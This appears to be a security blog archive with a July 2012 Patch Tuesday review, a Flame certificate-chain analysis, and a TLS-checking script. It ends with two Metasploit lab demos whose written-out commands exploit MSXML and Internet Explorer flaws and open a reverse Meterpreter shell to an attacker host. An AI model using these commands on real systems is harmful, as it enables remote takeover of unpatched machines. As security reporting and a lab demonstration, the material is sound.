Tag Archives: Microsoft

Microsoft July 2012 Patch Tuesday Review

On 10 July 2012, during its July Patch Tuesday, Microsoft released two security advisories and nine security bulletins. Of the two advisories, one pre-empts a forthcoming 0day disclosure; of the nine bulletins, six fix publicly disclosed vulnerabilities.

Microsoft Security Advisory 2719662

MSA-2719662 recommends disabling Windows Sidebar and Gadgets, available on Windows Vista and Windows 7, as soon as possible. Arbitrary code execution is possible through Windows Sidebar when it runs insecure Gadgets. The KB-2719662 Fix It solution provides a way to disable Windows Sidebar and Gadgets. Microsoft credits Mickey Shkatov and Toby Kohlenberg for this MSA.

It is quite surprising and disturbing that Microsoft recommends disabling Windows Sidebar and Gadgets, which are used by a large number of end users. The argument used to push users to deactivate these features is that Windows 8 will deprecate Sidebar and Gadgets. Why disable features of a supported version just because the next version will no longer use them? This deactivation is comparable to disabling Widgets under Mac OS X. I think the reason is quite simple: Mickey Shkatov will present a session called “We have you by the Gadgets“ at Black Hat US 2012 on 26 July. My feeling is that the discovered vulnerabilities would take too long and be too hard to fix, and that Microsoft has decided to no longer support Sidebar and Gadgets.

Microsoft Security Advisory 2728973

MSA-2728973 is a follow-up to the consequences of the Flame malware attacks: more Microsoft digital certificates have been moved to the “Untrusted Certificates Store”. The main reasons are that Microsoft considers the affected digital certificates to fall outside its secure storage practices, and that their RSA key lengths are less than 2048 bits, the length considered best practice. KB-2728973 will correct these issues. Remember that in June 2012 Microsoft had decided to block RSA keys shorter than 1024 bits.

What is interesting is that these keys were considered not to follow Microsoft's secure storage practices. Were these keys accessed by unnecessary custodians? Were the keys not stored in an encrypted format, or the key-encrypting keys not stored separately from the data-encrypting keys? Were the keys stored in multiple uncontrolled locations and forms? Were the keys distributed in an insecure manner? No answers 🙂

MS12-043 – Microsoft XML Core Services

The MS12-043 security update, classified as Critical and addressing remote code execution, is the fix for CVE-2012-1889, found exploited in the wild in June 2012. A Metasploit PoC for this vulnerability was released on 15 June, and it was integrated into the Blackhole exploit kit at the end of June.

MS12-044 – Cumulative Security Update for Internet Explorer

The MS12-044 security update, classified as Critical and addressing remote code execution, fixes two vulnerabilities, CVE-2012-1522 and CVE-2012-1524. Both were reported through VeriSign iDefense Labs coordinated vulnerability disclosure. CVE-2012-1522 was discovered by Jose A. Vazquez and CVE-2012-1524 by Omair.

MS12-045 – Microsoft Data Access Components [MDAC]

The MS12-045 security update, classified as Critical and addressing remote code execution, fixes one vulnerability, CVE-2012-1891, which was reported through ZDI coordinated vulnerability disclosure.

MS12-046 – Visual Basic

The MS12-046 security update, classified as Important and addressing remote code execution, fixes one vulnerability, CVE-2012-1854. This vulnerability has been found exploited in the wild since mid-March! The targeted attacks focused on Japanese organizations.

MS12-047 – Windows Kernel-Mode Drivers

The MS12-047 security update, classified as Important and addressing escalation of privilege, fixes two vulnerabilities, CVE-2012-1890 and CVE-2012-1893. CVE-2012-1890 has been publicly disclosed and was discovered by Nicolas Economou of Core Security Technologies and by Qihoo 360 Security Center. CVE-2012-1893 was reported through coordinated vulnerability disclosure by Lufeng Li of Neusoft Corporation. Public exploit code exists for CVE-2012-1893 but is limited to a local DoS. Some details of CVE-2012-1890 have been provided by Core Security Technologies.

MS12-048 – Windows Shell

The MS12-048 security update, classified as Important and addressing remote code execution, fixes one vulnerability, CVE-2012-0175. It was reported through coordinated vulnerability disclosure by Adi Cohen of IBM Security Systems, who has also provided vulnerability details.

MS12-049 – TLS

The MS12-049 security update, classified as Important and addressing information disclosure, fixes one vulnerability, CVE-2012-1870, which has been publicly disclosed.

MS12-050 – SharePoint

The MS12-050 security update, classified as Important and addressing escalation of privilege, fixes six vulnerabilities: CVE-2012-1858, CVE-2012-1859, CVE-2012-1860, CVE-2012-1861, CVE-2012-1862 and CVE-2012-1863.

CVE-2012-1858 has been publicly disclosed by Adi Cohen of IBM Security Systems and could allow XSS attacks. Proof-of-concept code is available from IBM Security Systems.

CVE-2012-1859, CVE-2012-1860, CVE-2012-1861, CVE-2012-1862 and CVE-2012-1863 were reported through coordinated vulnerability disclosure.

MS12-051 – Microsoft Office for Mac

The MS12-051 security update, classified as Important and addressing escalation of privilege, fixes one vulnerability, CVE-2012-1894. This vulnerability has been found exploited in the wild in targeted attacks against Tibetan organizations.

update.microsoft.com SSL warnings due to certificate chain update

Flame malware, the buzz of June 2012, had an interesting replication method through the Microsoft Windows Update service. The SNACK (NBNS spoofing) and MUNCH (spoofing of proxy detection and Windows Update requests) Flame modules allowed man-in-the-middle (MITM) attacks that distributed forged Windows updates to the targets.

The hostnames targeted by the MITM were:

download.windowsupdate.com
download.microsoft.com
update.microsoft.com
www.update.microsoft.com
v5.windowsupdate.microsoft.com
windowsupdate.microsoft.com
www.download.windowsupdate.com
v5stats.windowsupdate.microsoft.com

The problem was that components of Flame were signed with a forged certificate that the attackers were able to create by exploiting a weakness in Microsoft Terminal Services, which allowed users to sign code with Microsoft certificates.

Microsoft has issued a security advisory (MSA-2718704) and an update (KB-2718704) that removes the untrusted certificates.

But as of today, the “Microsoft Root Certificate Authority” root certificate and the “Microsoft Update Secure Server CA 1” intermediate certificate are no longer trusted by the majority of Internet browsers, such as Firefox, Chrome, Safari and Opera. The cause is that Microsoft has regenerated the Windows Update certificate chain. The chain of trust is broken (Qualys SSL Labs, SSL Shopper SSL Checker) for www.update.microsoft.com and update.microsoft.com.

SSL certificates for the following domain names are also no longer trusted, because the chain of trust is broken:

www.update.microsoft.com
update.microsoft.com
v5.windowsupdate.microsoft.com
windowsupdate.microsoft.com

The SSL certificates associated with the following domain names are also no longer trusted, because they point to a host that does not correspond to the requested domain name (hosted on Akamai):

download.windowsupdate.com
download.microsoft.com
www.download.windowsupdate.com

With KB-2718704 installed on an up-to-date Windows XP SP3, only the “www.update.microsoft.com” domain could be considered trusted, and only if you use Internet Explorer.

But despite the installation of KB-2718704, the following domains are still invalid:

update.microsoft.com
v5.windowsupdate.microsoft.com
windowsupdate.microsoft.com
download.windowsupdate.com
download.microsoft.com
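As an added example (not part of the original post), the following Python script re-checks the chain of trust for the Windows Update hostnames listed above using only the standard library, and separates the two failure modes described here: a broken chain (the regenerated intermediate does not reach a root the client trusts) and a certificate presented by a host that does not match the requested name (the Akamai case). The host list is the post's; the classification relies on the error strings OpenSSL reports through Python's ssl module, and the live check needs network access.

```python
import socket
import ssl

# Hostnames from the post, checked against this machine's own trust store.
UPDATE_HOSTS = [
    "www.update.microsoft.com",
    "update.microsoft.com",
    "v5.windowsupdate.microsoft.com",
    "windowsupdate.microsoft.com",
    "download.windowsupdate.com",
    "download.microsoft.com",
    "www.download.windowsupdate.com",
]

# Substrings of OpenSSL verify errors that mean the presented chain does not
# reach a trusted root (e.g. a regenerated intermediate the client lacks).
CHAIN_ERRORS = (
    "unable to get local issuer certificate",
    "unable to get issuer certificate",
    "self signed certificate in certificate chain",
    "self-signed certificate in certificate chain",
)

def classify_tls_error(message: str) -> str:
    """Map an ssl.SSLCertVerificationError message to the post's failure modes:
    'hostname-mismatch' (cert issued for another name), 'chain-broken' or 'other'."""
    msg = message.lower()
    if "hostname mismatch" in msg or "doesn't match" in msg:
        return "hostname-mismatch"
    if any(err in msg for err in CHAIN_ERRORS):
        return "chain-broken"
    return "other"

def check_host(host: str, port: int = 443, timeout: float = 5.0) -> tuple:
    """Return (host, 'trusted') or (host, <failure class>) for one TLS endpoint.
    The default context enforces CERT_REQUIRED plus hostname checking, as a browser does."""
    ctx = ssl.create_default_context()
    try:
        with socket.create_connection((host, port), timeout=timeout) as raw:
            with ctx.wrap_socket(raw, server_hostname=host):
                return (host, "trusted")  # handshake completed, chain and name valid
    except ssl.SSLCertVerificationError as exc:
        return (host, classify_tls_error(str(exc)))
    except (ssl.SSLError, OSError) as exc:
        return (host, "other: %s" % exc)  # timeout, refused, protocol error...

if __name__ == "__main__":
    for name in UPDATE_HOSTS:
        print("%-34s %s" % check_host(name))
```

Running it against the system trust store of the browser's platform rather than Internet Explorer's reproduces the difference the post observes between IE and the other browsers.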


MS12-043 Microsoft XML Core Services Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild
Public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-15

PoC provided by :

sinn3r
juan vazquez

Reference(s) :

MSA-2719615
MS12-043
MS KB 2719615
CVE-2012-1889
OSVDB-82873

Affected version(s) :

Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0.

Tested on Windows XP Pro SP3 with :

Internet Explorer 6 (6.0.2900.5512.xpsp_sp3_gdr.11025-1629)

Description :

This module exploits a memory corruption flaw in Microsoft XML Core Services when trying to access an uninitialized Node with the getDefinition API, which may corrupt memory allowing remote code execution. At the moment, this module only targets Microsoft XML Core Services 3.0 via IE6 and IE7 over Windows XP SP3.

Commands :

use exploit/windows/browser/msxml_get_definition_code_exec
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid

MS12-037 Internet Explorer Same ID Vulnerability Metasploit Demo

Timeline :

Vulnerability found exploited in the wild
Public release of the vulnerability the 2012-06-12
Metasploit PoC provided the 2012-06-13

PoC provided by :

Dark Son
Qihoo 360 Security Center
Yichong Lin
Google Inc.
juan vazquez

Reference(s) :

MS12-037
CVE-2012-1875
OSVDB-82865
https://twitter.com/binjo/status/212795802974830592

Affected version(s) :

Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Internet Explorer 9

Tested on Windows XP Pro SP3 with :

Internet Explorer 8 (8.0.6001.18702) and msvcrt ROP

Description :

This module exploits a memory corruption flaw in Internet Explorer 8 when handling objects with the same ID property. At the moment this module targets IE8 over Windows XP SP3 through the heap massaging plus heap spray as exploited in the wild.

Commands :

use exploit/windows/browser/ms12_037_same_id
set SRVHOST 192.168.178.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

sysinfo
getuid